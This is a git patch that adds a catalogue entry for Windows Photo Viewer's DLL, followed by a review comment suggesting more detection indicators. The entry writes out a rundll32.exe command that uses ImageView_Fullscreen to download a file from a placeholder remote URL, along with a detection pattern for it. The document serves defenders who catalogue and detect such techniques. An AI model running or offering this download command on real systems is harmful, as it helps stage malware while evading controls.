From 4ea5c504a483ed8338ea4e8e55f48e44cb6edbe1 Mon Sep 17 00:00:00 2001 From: Avihay Eldad <46644022+avihayeldad@users.noreply.github.com> Date: Sat, 28 Jun 2025 17:04:30 +0300 Subject: [PATCH] Add PhotoViewer.yml (#441) Co-authored-by: Wietze --- yml/OSLibraries/PhotoViewer.yml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 yml/OSLibraries/PhotoViewer.yml diff --git a/yml/OSLibraries/PhotoViewer.yml b/yml/OSLibraries/PhotoViewer.yml new file mode 100644 index 0000000..92d09c4 --- /dev/null +++ b/yml/OSLibraries/PhotoViewer.yml @@ -0,0 +1,24 @@ +--- +Name: PhotoViewer.dll +Description: Windows Photo Viewer +Author: Avihay Eldad +Created: 2025-06-22 +Commands: + - Command: rundll32.exe "C:\Program Files\Windows Photo Viewer\PhotoViewer.dll",ImageView_Fullscreen {REMOTEURL} + Description: Once executed, rundll32.exe will download the file at the specified URL to the user's INetCache folder using the Windows Photo Viewer DLL. + Usecase: Download file from remote location. + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows 10, Windows 11 + Tags: + - Download: INetCache +Full_Path: + - Path: C:\Program Files\Windows Photo Viewer\PhotoViewer.dll + - Path: C:\Program Files (x86)\Windows Photo Viewer\PhotoViewer.dll +Detection: + - IOC: Execution of rundll32.exe with 'ImageView_Fullscreen' and a remote URL (containing '://') as an argument +Acknowledgement: + - Person: Avihay Eldad + Handle: '@avihayeldad' + - Person: Tommy Warren
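Review bot: The Detection list covers only the command line, while the Description and the `Download: INetCache` tag state that the observable side effect is a file written to the user's INetCache folder; consider adding a second IOC for a file created under INetCache by a rundll32.exe process that also carries `ImageView_Fullscreen`, so the entry can be detected from file-creation telemetry as well as process-creation telemetry. Two smaller points in the same hunk: the Command uses only `C:\Program Files\Windows Photo Viewer\PhotoViewer.dll` while Full_Path also lists the `(x86)` location, so the IOC or Command description should make clear that both DLL paths apply; and the second Acknowledgement entry (`- Person: Tommy Warren`) has no `Handle:` line where the first entry does, so either add one or note that it is intentionally omitted for consistency with the file's format.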